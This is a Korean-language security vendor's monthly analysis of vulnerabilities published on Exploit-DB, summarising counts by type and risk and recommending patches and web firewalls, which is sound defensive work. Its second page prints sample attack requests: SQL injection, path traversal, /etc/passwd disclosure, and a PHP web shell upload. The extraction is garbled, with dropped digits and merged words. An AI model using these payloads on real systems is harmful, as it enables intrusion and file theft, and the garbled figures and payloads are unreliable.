EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

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1 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두 ' ' 인공격또한 SQL Injection 입니다. 모두 ' ' 인 SQL Injection 케이스 "Advantech WebAccess < 8.3 " 취약점은 URL 경로간에공격코드가삽입되는특이한취약점입니다. 해당취약점을포함여 EDB 분석보고서에공개된취약점에대해예방기위해서최신패치와시큐어코딩을권장합니다. 지만완벽한시큐어코딩은불가능며, 지속적으로보안성을유지기위해서웹방화벽을활용한심층방어 (Defense indepth) 구현을고려해야합니다.. 취약점별보고개수 취약점 보고개수 File Upload 2 Command Injection 3 5 XSS 8 SQL Injection 취약점별보고개수 총합계 File Upload Command Injection XSS SQL Injection 총합계 2. 위험도별분류 위험도 보고개수 백분율 % % 위험도별분류 % 총합계 % 0 3. 공격난이도별현황 공격난이도 보고개수 백분율 % % % 총합계 % 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 CentOS Web 3 2 Local 2 PACSOne Server 2 Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression Worpress Service Finder Booking Zechat Photos in Wifi LearnDash Smart Google Code Inserter Muviko Buddy Zone Events Calendar Joomla! Component Visual Calendar Shopware LiveCRM SaaS Cloud SAP NetWeaver J2EE Engine Affiligator Xnami Wchat pfsense Tumder ImgHosting Flexible Poll Domains & Hostings Manager Learning Management System RISE Task Rabbit Clone ILIAS Multilanguage Real Estate MLM Flash Operator Advantech WebAccess Zomato Clone Joomla! Component CP Event Calendar Reservo Image Hosting Hot s Clone SugarCRM 총합계 50 공격난이도별현황 주요소프트웨어별취약점발생현황 CentOS Web Local PACSOne Server Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression

2 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 POST /wp-admin/options-general.php?page=smartcode HTTP/. POST /wp-admin/options-general.php?page=smartcode HTTP/. action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=o n Smart Smart Google Code Google Code Inserter Inserter < SQL Injection EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection /xdashboard/html/jobhistory/jobdochistorylist.action?model. jobhistoryid= and =2 EMC xpression EMC xpression 4.5SP Patch 3 POST /gespage/webapp/users/prnow.jsp HTTP/ SQL Injection Gespage show_prn=');select PG_SLEEP(3)-- POST /ges/webapp/users/blhistory.jsp HTTP/. Gespage Gespage show_month=');select PG_SLEEP(3) Photos in Wifi.0. - Path /asset.php?id=40c9c b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext] Photos in Wifi Photos in Wifi.0. POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd f File Upload LearnDash Arbitrary File Upload dd f2 Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php Content-Type: application/octet-stream <?php echo exec("ls -la /etc/passwd"); dd f2-- Content-Disposition: form-data; name="post" LearnDash LearnDash foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f SQL Injection < POST /photo/include/blog/label.php HTTP/. < action=get_article_label&article_id=; SELECT version(); < POST /photo/include/file_upload.php?dir=2f2e2e2f f72 652f50686f7 HTTP/. < action=aviary_add&url=file:///etc/passwd Worpress Service Finder Booking < Local File Disclosure /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd Worpress Service Finder Booking Worpress Service Finder Booking < 3.2

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